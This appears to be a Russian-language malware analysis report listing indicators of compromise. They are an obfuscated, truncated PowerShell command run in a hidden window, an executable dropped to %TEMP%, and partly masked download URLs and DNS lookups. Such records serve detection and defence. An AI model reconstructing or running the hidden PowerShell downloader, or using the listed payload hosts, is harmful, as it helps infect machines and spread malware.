Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -jOin('41L70h94R122S111M79M88S45@48Z45R99K104@122h32h98K111Z103Z104L110S121@45M127~108L99M105h98M96K54~41M78@93Z123M90S100h122M45M48>45>99K104M122K32h98K111S103R104>110Z121L45~94>116S126R121M10...
- %TEMP%\4472.exe
- %TEMP%\4472.exe
- %TEMP%\4472.exe
- 'su####headline.com':80
- 'tr##e.org':80
- 'we#####.#yregisteredsite.com':80
- 'sc##ned.com':80
- 'wp#.#olweb.ru':80
- 'ge#####enviroman.com':80
- http://www.su####headline.com/v8bRL5/
- http://tr##e.org/nSv3j3/
- http://we#####.#yregisteredsite.com/frozen-redirect.html
- http://sc##ned.com/ZssYh/
- http://www.wp#.#olweb.ru/AaqX/
- http://ge#####enviroman.com/rrWQTY/
- DNS ASK su####headline.com
- DNS ASK tr##e.org
- DNS ASK we#####.#yregisteredsite.com
- DNS ASK sc##ned.com
- DNS ASK wp#.#olweb.ru
- DNS ASK ge#####enviroman.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -jOin('41L70h94R122S111M79M88S45@48Z45R99K104@122h32h98K111Z103Z104L110S121@45M127~108L99M105h98M96K54~41M78@93Z123M90S100h122M45M48>45>99K104M122K32h98K111S103R104>110Z121L45~94>116S126R121M10...' (со скрытым окном)